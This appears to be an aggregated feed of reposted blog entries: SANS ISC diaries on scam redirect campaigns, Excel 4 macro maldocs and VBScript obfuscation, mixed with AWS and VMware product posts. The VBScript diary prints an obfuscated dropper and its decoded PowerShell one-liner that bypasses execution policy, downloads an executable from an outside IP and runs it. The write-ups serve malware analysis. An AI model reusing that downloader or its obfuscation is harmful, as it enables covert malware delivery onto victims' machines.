Quick look at a couple of current online scam campaigns, (Tue, Feb 25th)

This post was originally published on this site

Since I was exposed to three different online scam campaigns in the last three weeks, without having to go out and search for them, I thought that today might be a good time to take a look at how some of the current online scams work.

All of the campaigns we’ll mention seemed to target people in the Czech Republic, although not exclusively, as one of the landing pages I found had at least 20 different regional variants set up for countries from all over the world. In cases where I was unable to find an English version of a page, I had Chrome translate it – the results are not always pretty, but should be sufficient for our purposes.

Everything started a couple of weeks ago, when I was searching for a website of a certain small town theater on my phone. Having found it on Google, I tapped the relevant link and was surprised when, my browser didn’t stop at the intended destination, but rather was redirected to a site proclaiming me a “lucky visitor” of the day with a “chance to win Apple iPhone 11 Pro”.

Given all the ad blockers and script filters I usually use, I didn’t see any similar pages or pop-ups similar to this one (not counting phishing pages, of course) for a long time, so I decided to take a closer look at it. After clicking through four questions related to my preference in browsers, I was informed that I had a chance to win a brand new iPhone (although it wasn’t quite obvious that the offer was to enter a contest and not to buy the phone at an incredibly low price, as you may see for yourself).

One interesting part of this page, which deservers a special mention, was the comments section at the end, as it was seemingly populated in real time through JavaScript embedded in the HTML code. That is, all the comments were loaded as part of the original page at the same time, but displayed one at a time. I imagine that having them appear one after another with “like counts” rising while the user watches might look quite convincing to potential victims.

After clicking the button, browser was redirected to another domain where it seemed, once again, as if a user had the option to buy an iPhone for a small fraction of its usual price.

Next, the site asked for some personal information – a full name and an address along with an e-mail and a phone number.

What wasn’t obvious at first glance, but would be really important to anyone actually trying to order the phone, was a small paragraph hidden at the end of the page, explaining that the customer wasn’t actually buying an iPhone, but was merely entering a prize draw for it. By itself, that wouldn’t be so bad, but the rest of the text mentioned that, besides confirming his participation in the contest, the user would be subscribing to an unnamed pre-paid service with a €75 monthly fee.

The last thing required of a user at that point, would be to fill in his credit card details in order to confirm the payment. Not the €75 subscription, which would later be charged against users account, but the “price” for the iPhone (or rather for a participation in the iPhone lottery) of approximately €1.5.

About a week after I found the previously mentioned website, a colleague of mine asked me, laughing, whether I wanted to buy a new iPhone for €2. My first guess was that he managed to end up on the same site I did. This, however, didn’t turn out to be the case as the second campaign was a straightforward phishing. Nevertheless, what caught my attention was the use of the same graphical style I saw in the previous campaign.

Apart from the stripe at the top, the landing page (and other pages, all the way to the payment form) was nearly identical to those used in the first campaign as well.

Unlike in the first campaign, however, there was no paragraph on any of the pages explaining whether the user was actually subscribing to any service, so it is hard to say what unexpected things one might be charged for if one actually tried to buy an iPhone in this way.

Although the second campaign comes much closer to a phishing style of operation than to a classic scam, re-use of the same assets in both campaigns is interesting. Use of the same phishing kits (or “scamas” as they are sometimes called) on multiple sites is not too unusual – many such kits are actually open-sourced and some may even be found on GitHub. Nevertheless, one usually doesn’t expect to see the same kit used twice within a couple of weeks for two different campaigns with different modes of operation…much less three.

On Saturday, I was looking for information about a vulnerability in a certain software product and one of the results, which Google returned, ended up pointing my browser to another site with the same landing page offering iPhones for €2. At first glance, it looked like another campaign simply re-using the same kit, however, after a bit of digging around, I discovered that this campaign was actually much more complex than the previous ones.

The first and second campaigns used couple of forced redirects each to get a user to the landing page.

The third campaign had multiple starting pages on multiple domains redirecting to a couple of domains/IP addresses, which finally redirected to multiple landing pages (or, under some conditions, to Google). I only mapped out a small part of the starting and landing pages, but the following diagram should give you an idea of the inner workings of this campaign.

Since all three parts of the redirection chain were interesting, let’s take a look at each one in turn.

The initial/starting pages used cloaking (i.e. serving different content to search engine spiders than to regular users[1]), which was the reason I landed on one of these pages in the first place – Google had it indexed as containing information which wasn’t actually there. In addition to the cloak, a referrer check was implemented on the servers serving the initial pages to make things a little more complicated. The behavior and responses of the servers did therefore differ quite significantly based on a couple of factors.

  • If a user should manually enter the address of one of the initial pages (for example hxxp://wzhi.buxtex.de/web-shell.html), the server would return a HTTP 404 response.
  • If the same user were to navigate to the same page through a link from a search engine, the server would return a HTTP 302 response and would redirect the browser in the way shown in the diagram above. The server would only provide the 302 response if an address of a well-known search engine (e.g. Google or Bing) was present in the Referer header of the HTTP request. With the Referer header set to any other value, the server would – once again – return a 404 response.
  • Finally, if a search engine spider such as Googlebot were to visit the page, it (or anyone using a User-Agent header set to “Googlebot”) would be served with a clickbait content cobbled together from different sites. In case of web-shell.html for example, one part of the content was taken from an article published on rapid7.com.

Given the behavior of the servers described above, it is almost certain that any real user would be redirected to another URL after visiting one of the initial pages. That would start a chain of multiple forced redirections between the domains and IP addresses mentioned in the diagram above (and potentially others as well).

Although many of these appear to be suspicious at first glance, not all of them are necessarily malicious – one of the domains, ladsblue.com, actually belongs to a commercial advertising network named Adsterra. A quick Google search for Adsterra led to a number of claims that this network doesn’t always operate ethically[2], however, hoping that these claims are not correct, I did let the company know about the misuse of their ad network with the hope that they will block it.

The redirection chain would end on one of a number of different landing pages, chosen based on geolocation of the IP address from which the user was connected (and potentially other factors). It is possible that not all of the pages one might land on after the redirects end are related to scams. One of the redirection chains, for example, led to a page for a certain betting site, and even though Google results seem to indicate that it might not be a completely legitimate service, I can’t be sure of that without further research I wasn’t willing to put in.

The one site we can be quite sure was a scam, however (apart from the site using the “iPhone for €2” kit we saw in the first two campaigns), was hosted at the domain hxxps://financialwealthnow.net. The reason we may be certain of the fraudulent nature of the site is that this site was a copy of the official website of a Czech 24 hour news TV station[3].

This is the real site…

…and this is the fake one.

The text on the site tries to get visitors to register with a cryptocurrency trading platform with promises of instant wealth and with the help of a fake interview with a well-known Czech politician and entrepreneur praising the platform. If you’d like to take a closer look at the contents of the fake page, I wrote a short post about it (in Czech) at untrustednetwork.net[4].

What appears to be even more interesting than the contents of the page themselves is that the site seems to be part of a much larger operation using fake celebrity interviews and deceptive ads, which is run by a group called FizzCore (thanks to @vavkamil for pointing this out to me). The description of (for lack of a better term) TTPs of this actor provided in the analysis published by Confiant[5] fits the fake news page exactly.

Although the last campaign is quite interesting, neither it, nor either one of the previous ones, were unique. Similarly, forced multiple redirects to less than reputable sites are nothing new. Even though both of these statements are true, I found the brief look I was given into the world of current internet scams fairly informative… And I hope that you did as well.

[1] https://en.wikipedia.org/wiki/Spamdexing#Cloaking
[2] https://www.google.com/search?q=adsterra+scam
[3] https://ct24.ceskatelevize.cz/
[4] https://www.untrustednetwork.net/cs/2020/02/22/ct24_podvodna_stranka/
[5] https://blog.confiant.com/fake-celebrity-endorsed-scam-abuses-ad-tech-to-net-1m-in-one-day-ffe330258e3c

Jan Kopriva
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Amazon FSx for Lustre Update: Persistent Storage for Long-Term, High-Performance Workloads

This post was originally published on this site

Last year I wrote about Amazon FSx for Lustre and told you how our customers can use it to create pebibyte-scale, highly parallel POSIX-compliant file systems that serve thousands of simultaneous clients driving millions of IOPS (Input/Output Operations per Second) with sub-millisecond latency.

As a managed service, Amazon FSx for Lustre makes it easy for you to launch and run the world’s most popular high-performance file system. Our customers use this service for workloads where speed matters, including machine learning, high performance computing (HPC), and financial modeling.

Today we are enhancing Amazon FSx for Lustre by giving you the ability to create high-performance file systems that are durable and highly available, with three performance tiers, and a new, second-generation scratch file system that is designed to provide better support for spiky workloads.

Recent Updates
Before I dive in to today’s news, let’s take a look at some of the most recent updates that we have made to the service:

Data Repository APIs – This update introduced a set of APIs that allow you to easily export files from FSx to S3, including the ability to initiate, monitor, and cancel the transfer of changed files to S3. To learn more, read New Enhancements for Moving Data Between Amazon FSx for Lustre and Amazon S3.

SageMaker Integration – This update gave you the ability to use data stored on an Amazon FSx for Lustre file system as training data for an Amazon SageMaker model. You can train your models using vast amounts of data without first moving it to S3.

ParallelCluster Integration – This update let you create an Amazon FSx for Lustre file system when you use AWS ParallelCluster to create an HPC cluster, with the option to use an existing file system as well.

EKS Integration – This update let you use the new AWS FSx Container Storage Interface (CSI) driver to access Amazon FSx for Lustre file systems from your Amazon EKS clusters.

Smaller File System Sizes – This update let you create 1.2 TiB and 2.4 TiB Lustre file systems, in addition to the original 3.6 TiB.

CloudFormation Support – This update let you use AWS CloudFormation templates to deploy stacks that use Amazon FSx for Lustre file systems. To learn more, check out AWS::FSx::FileSystem LustreConfiguration.

SOC Compliance – This update announced that Amazon FSx for Lustre can now be used with applications that are subject to Service Organization Control (SOC) compliance. To learn more about this and other compliance programs, take a look at AWS Services in Scope by Compliance Program.

Amazon Linux Support – This update allowed EC2 instances running Amazon Linux or Amazon Linux 2 to access Amazon FSx for Lustre file systems.

Client Repository – You can now make of use Lustre clients that are compatible with recent versions of Ubuntu, Red Hat Enterprise Linux, and CentOS. To learn more, read Installing the Lustre Client.

New Persistent & Scratch Deployment Options
We originally launched the service to target high-speed short-term processing of data, and as a result until today FSx for Lustre provided scratch file systems which are ideal for temporary storage and shorter-term processing of data — Data is not replicated and does not persist if a file server fails. We’re now expanding beyond short-term processing by launching persistent file systems, designed for longer-term storage and workloads, where data is replicated and file servers are replaced if they fail.

In addition to this new deployment option, we are also launching a second-generation scratch file system that is designed to provide better support for spiky workloads, with the ability to provide burst throughput up to 6x higher than the baseline. Like the first-generation scratch file system, this one is great for temporary storage and short-term data processing.

Here is a table that will help you to chose between the deployment options:

Persistent Scratch 2 Scratch 1
API Name
Storage Replication Same AZ None None
Aggregated Throughput
(Per TiB of Provisioned Capacity)
50 MB/s, 100 MB/s, 200 MB/s 200 MB/s, Burst to 1,200 MB/s 200 MB/s
IOPS Millions Millions Millions
Latency Sub-millisecond, higher variance Sub-millisecond, very low variance Sub-millisecond, very low variance
Expected Workload Lifetime Days, Weeks, Months Hours, Days, Weeks Hours, Days, Weeks
Encryption at Rest Customer-managed or FSx-managed keys FSx-managed keys FSx-managed keys
Encryption In Transit Yes, when accessed from supported EC2 instances in these regions. Yes, when accessed from supported EC2 instances in these regions. No
Initial Storage Allocation
1.2 TiB, 2.4 TiB, and increments of 2.4 TiB 1.2 TiB, 2.4 TiB, and increments of 2.4 TiB 1.2 TiB, 2.4 TiB, 3.6 TiB
Additional Storage Allocation 2.4 TiB 2.4 TiB 3.6 TiB

Creating a Persistent File System
I can create a file system that uses the persistent deployment option using the AWS Management Console, AWS Command Line Interface (CLI) (create-file-system), a CloudFormation template, or the FSx for Lustre APIs (CreateFileSystem). I’ll use the console:

Then I mount it like any other file system, and access it as usual.

Things to Know
Here are a couple of things to keep in mind:

Lustre Client – You will need to use an AMI (Amazon Machine Image) that includes the Lustre client. You can use the latest Amazon Linux AMI, or you can create your own.

S3 Export – Both options allow you to export changes to S3 using the CreateDataRepositoryTask function. This allows you to meet stringent Recovery Point Objectives (RPOs) while taking advantage of the fact that S3 is designed to deliver eleven 9’s of durability.

Available Now
Persistent file systems are available in all AWS regions. Scratch 2 file systems are available in all commercial AWS regions with the exception of Europe (Stockholm).

Pricing is based on the performance tier that you choose and the amount of storage that you provision; see the Amazon FSx for Lustre Pricing page for more info.


AWS has launched the Activate Founders package for Startups 🚀

This post was originally published on this site

Are you in a Startup?

As of today, AWS has launched the Activate Founders package for Startups! 🚀🚀🚀This package unlocks a new set of benefits. If your startup isn’t affiliated with a venture capital firm, accelerator, or incubator, then your startup can now apply to receive $1,000 in AWS Activate Credits (valid for 2 years) and $350 in AWS Developer Support Credits of AWS technical support (valid for 1 year).

👉🏽Visit aws.amazon.com/activate to learn more about the Activate Founders package and apply today.

What kind of Startups will the Activate Founders package help?

The Activate Founders package will help a lot of startups that have not yet raised institutional funding or have no plans to do so.

What kind of benefits will the Activate Founders package bring to customers?

  • Let’s start with Activate Founders credits. 💰They’re a cost-saving opportunity for experimenting, building, testing, and deploying startup architecture on AWS.
  • The AWS Developer Support Credits give startups unlimited support case access to AWS technical support through email 📧.
  • 7 Core AWS Trusted Advisor best practice checks
  • Free digital training paths for various business and technical roles, skill levels, and cloud topics.

What kind of Startups qualify for the Activate Founders package?

Startups interested in applying for the Activate Founders package benefits cannot have institutional funding, must have an AWS account, and complete the Activate Founders application form. (Startups affiliated with a venture capital firm, accelerator, or incubator, or who have previously received Activate benefits will not qualify.)

The main 6 criteria to qualify for the Activate Founders package are as follows…

  1. Complete the Activate Founders application form and provide a description of their startup.
  2. No institutional funding and not affiliated with a venture capital firm, accelerator, or incubator.
  3. Must have an AWS Account ID.
  4. Have not previously received Activate benefits.
  5. A company website or company web profile (e.i. CrunchBase, AngelList, Product Hunt, Entrepedia).
  6. Provide their LinkedIn profile.

How does a Startup apply for the Activate Founders package?

👉🏽Startups interested in applying for the Activate Founders package benefits can access the application directly from the AWS Activate console: https://console.aws.amazon.com/activate.

That said, more information about the AWS Activate program itself or details about all Activate benefits packages can be found here: https://aws.amazon.com/activate.

Will you apply?

We hope so! We look forward to helping even more customers. 🥳

NSX-T Single-Tier Routing

This post was originally published on this site

In this blog article I am going to cover how to configure NSX-T routing. In my previous NSX-T blog articles, up to this point, I have covered installing/configuring various components of NSX-T including the NSX-T Manager, host transport nodes, transport zones (Overlay and VLAN), edge nodes and so on. The only difference between those blogs … Continue reading NSX-T Single-Tier Routing

vRealize Automation 8 Increasing Disk Space

This post was originally published on this site

I was running into an issue in my Home Lab when upgrading vRealize Automation 8.0.0 to vRealize Automation 8.0.1. The upgrade was performed with vRealize Suite Lifecycle Manager or in short vRLCM and it could not complete the precheck because of issues related to the free disk space and disk space size. Here is an …

The post vRealize Automation 8 Increasing Disk Space appeared first on Be-Virtual.net.

Maldoc: Excel 4 Macros and VBA, Devil and Angel?, (Mon, Feb 24th)

This post was originally published on this site

Philippe Lagadec, the developer of ole-tools, pointed out something interesting about the following maldoc sample (MD5 a0457c2728923cb46e6d9797fe7d81dd): it contains both Excel 4 macros and VBA code.

Here is the VBA code:

It’s just displaying a message box about a problem, and when the user clicks the OK button, it attempts to close Excel. Nothing nefarious here.

And here are the Excel 4 macros:

Launching a PowerShell command. A downloader: that’s nefarious.

This sample might well be a PoC, but it’s great to illustrate that both scripting technologies (ancient Excel 4 macros and old VBA) can coexist in the same document.

When you analyze potential malicious Excel files, it’s best to check both for the presence of Excel 4 macros and VBA code.


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introduction to VMware HCX Deployments

This post was originally published on this site

VMware HCX is an application mobility platform that is designed for simplifying application migration, workload rebalancing, and business continuity across data centers and clouds.

VMware HCX enables:

Application migration
You can schedule and migrate thousands of vSphere virtual machines within and across data centers without requiring a reboot.

Change platforms or upgrade vSphere versions
With HCX, you can migrate workloads from vSphere 5.x and non-vSphere (KVM and Hyper-V) environments within and across data centers or clouds to current vSphere versions without requiring an upgrade.

Workload rebalancing
Workload rebalancing provides a mobility platform across cloud regions and cloud providers to allow customers to move applications and workloads at any time to meet scale, cost management, compliance, and vendor neutrality goals.

Business continuity and protection
Using HCX capabilities, administrators can protect workloads by replicating them to other HCX enabled sites. Workload migration is available on-demand, or it can be scheduled for business or maintenance planning.

Maldoc: Excel 4 Macros in OOXML Format, (Sun, Feb 23rd)

This post was originally published on this site

I’ve mentioned Excel 4 macros before, a scripting technology that predates VBA.

In that diary entry, I handle .xls files (ole files). Excel 4 macros can also be stored in Office Open XML format files: .xlsm files.

If we take a look at an .xlsm file with Excel 4 macros with oledump.py, we’ll get this output:

There is no ole file (vbaProject.bin) file inside an Excel 4 macro-only file.

We need to take a look with zipdump.py:

The presence of folder macrosheets tells us that there are Excel 4 mcaro sheets inside this file.

We can look at the content of the XML file:

And pretty-print it with xmldump.py:

Now it’s easier to spot the formulas: EXEC(“calc.exe”) and HALT()

And the Auto_Open can be found in the worksheet XML file:

It’s possible to have both macro types inside the same file: Excel 4 and VBA macros. I’ll cover that in an upcoming diary entry.


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Simple but Efficient VBScript Obfuscation, (Sat, Feb 22nd)

This post was originally published on this site

Today, it’s easy to guess if a piece of code is malicious or not. Many security solutions automatically detonates it into a sandbox by security solutions. This remains quick and (most of the time still) efficient to have a first idea about the code behaviour. In parallel, many obfuscation techniques exist to avoid detection by AV products and/or make the life of malware analysts more difficult. Personally, I like to find new techniques and discover how imaginative malware developers can be to implement new obfuscation techniques.

This morning, I spotted a very simple VBSscript based on only 50 lines of code. It gets an excellent VT score: 1/60[1] but it was spotted by my hunting rule!

Basically, all suspicious keywords that could trigger a bell are random strings and replaced during the execution. Example:

x010 = Replace(x010,"OXentrew","Executionpolicy")
x010 = Replace(x010,"BCijaMA","bypass")

The most interesting variable is the following:

x002 = """" & x004 & """-OXentrew BCijaMA -NNoGayGay " _
  & " -windowstyle caralhos2 -Seisal ""Set-Content -value " _
  & " (new-object System.net.webclient)" _
  & ".FuiDUi( 'MIGOSEYLOVO54[.]233[.]198[.]219/a.exe' ) " _
  & " -encoding byte -Path  $env:appdataRiCOAOCAONetworkConnections" & rando & "; " _
  & " Start-Process ""$env:appdataRiCOAOCAONetworkConnections" & rando & """"""

Here is the decoded version:

CreateObject("Scripting.FileSystemObject").BuildPath(CreateObject("Wscript.Shell").expandenvironmentstrings( "%systemroot%" ), "System32WindowsPowerShellv1.0powershell.exe" )
  -Executionpolicy bypass
  -windowstyle hidden 
  -command "Set-Content -value (new-object System.net.webclient).downloaddata('http://54[.]233[.]198[.]219/a.exe' ) ) 
                 -encoding byte -Path  $env:appdataMicrosoftNetworkConnectionsxxxxxx.exe;
            Start-Process $env:appdataMicrosoftNetworkConnectionsxxxxx.exe"

(The dumped payload xxxxx.exe is a random string of 25 characters)

This onliner downloads and executes a payload. Wha about the payload? It’s a Putty client (SHA256:601cdbddfe6ac894daff506167c164c65446f893d1d5e4b95e92d960ff5f52b0), nothing malicious. There are good chances that this piece of code has been submitted to VT by a Red Team or attackers who are still brushing up their payload. The IP address is an AWS instance and the homepage returns:

me empresta 10k ai???

This Portuguese sentence means “lend me 10k there ???”

[1] https://www.virustotal.com/gui/file/e5f242deb5f37eb0754fa214ccb0b00593b348e63f1775a0c9e4529a8f78e1f8/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Digital Inheritance

This post was originally published on this site

What happens to our digital presence when we die or become incapacitated? Many of us have or know we should have a will and checklists of what loved ones need to know in the event of our passing. But what about all of our digital data and online accounts? Consider creating some type of digital will, often called a “Digital Inheritance” plan.